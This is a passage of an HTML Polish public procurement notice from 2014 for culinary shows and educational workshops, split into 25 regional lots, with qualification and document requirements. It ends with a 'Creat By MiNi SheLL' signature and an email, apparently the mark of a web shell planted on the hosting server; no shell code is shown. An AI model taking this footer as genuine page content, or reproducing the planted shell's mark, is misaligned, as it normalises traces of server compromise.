21. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 21: dysponuje przynajmniej jedną osobą, która
posiada wykształcenie rolnicze lub biologiczne lub pedagogiczne, oraz
posiada doświadczenie w prowadzeniu gospodarstwa ekologicznego;
22. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 22: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz;
23. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 23: dysponuje przynajmniej jedną osobą, która posiada doświadczenie w prowadzeniu gospodarstwa edukacyjnego;
24. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 24: dysponuje przynajmniej jedną osobą, która posiada doświadczenie w prowadzeniu gospodarstwa ekologicznego i produkcji ekologicznej;
25. w przypadku Wykonawcy składającego ofertę na zadanie częściowe nr 25: dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe o kierunku gastronomicznym lub żywieniowym, lub dyplom mistrzowski w zawodzie kucharz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dotyczy zadania częściowego nr 24:
Zgodnie z § 6 ust. 1, pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (poz. 231) Zmawiający wymaga dostarczenia wraz z ofertą zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich, tj:
aktualny na dzień składania ofert certyfikat gospodarstwa ekologicznego wydany przez jednostkę certyfikującą upoważnioną przez Ministra Rolnictwa i Rozwoju Wsi, potwierdzający, że gospodarstwo, w którym będą odbywać się warsztaty, posiada status gospodarstwa ekologicznego, w którym prowadzona jest produkcja ekologiczna.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://arr.pl/index.php?option=com_content&view=article&id=76&Itemid=83<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Nowy Świat 6/12, 00-400 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2014 godzina 12:00, miejsce: Agencja Rynku Rolnego w Warszawie, przy ul. Nowy Świat 6/12, Kancelaria Ogólna, hol główny, parter, wejście D/A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie pokazów kulinarnych organizowanych przez Oddział Terenowy ARR w Bydgoszczy dla uczniów szkół podstawowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazów kulinarnych organizowanych przez Oddział Terenowy ARR w Bydgoszczy dla uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Gdyni dla uczniów szkół ponadgimnazjalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Gdyni dla społeczności lokalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazów kulinarnych organizowanych przez Oddział Terenowy ARR w Gdyni dla mieszkańców woj. pomorskiego i turystów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazów kulinarnych organizowanych przez Oddział Terenowy ARR w Gdyni dla uczestników imprez plenerowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Gdyni dla personelu stołówek szkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Gorzowie Wlkp. dla uczniów szkół podstawowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów edukacyjno - kulinarnych organizowanych przez Oddział Terenowy ARR w Kielcach dla uczniów szkół podstawowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazów i warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Kielcach dla uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazu kulinarnego organizowanego przez Oddział Terenowy ARR w Krakowie dla uczestników Europejskich Targów Produktów Regionalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Krakowie dla uczniów szkół gastronomicznych i rolniczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Lublinie dla uczniów szkół rolniczych z klas o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Lublinie dla uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń organizowanych przez Oddział Terenowy ARR w Lublinie dla intendentów, szefów stołówek szkolnych i przedstawicieli firm cateringowych obsługujących szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazów, warsztatów kulinarnych oraz quizów organizowanych przez Oddział Terenowy ARR w Lublinie dla dzieci i dorosłych odwiedzających stoiska  podczas Festiwalu Smaku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów edukacyjno - kulinarnych organizowanych przez Oddział Terenowy ARR w Lublinie dla uczniów szkół podstawowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Olsztynie dla osób prowadzących kuchnię we własnych gospodarstwach agroturystycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie wykładów i pokazów kulinarnych organizowanych przez Oddział Terenowy ARR w Olsztynie dla uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów edukacyjnych organizowanych przez Oddział Terenowy ARR w Olsztynie dla dzieci z najstarszych grup przedszkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Opolu dla uczniów szkół gastronomicznych i rolniczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie pokazu i warsztatów kulinarnych organizowanych przez Oddział Terenowy ARR w Poznaniu dla uczniów szkół gastronomicznych i rolniczych o profilu gastronomicznym oraz dla uczestników warsztatów odbywających się podczas Festiwalu Dobrego Smaku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów edukacyjno - kulinarnych organizowanych przez Oddział Terenowy ARR w Warszawie dla dzieci przedszkolnych i uczniów z klas 0-III szkoły podstawowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów edukacyjnych organizowanych przez Oddział Terenowy ARR w Warszawie dla uczniów szkół rolniczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie warsztatów i pokazów kulinarnych organizowanych przez Oddział Terenowy ARR we Wrocławiu dla uczniów i nauczycieli szkół gastronomicznych i rolniczych o profilu gastronomicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com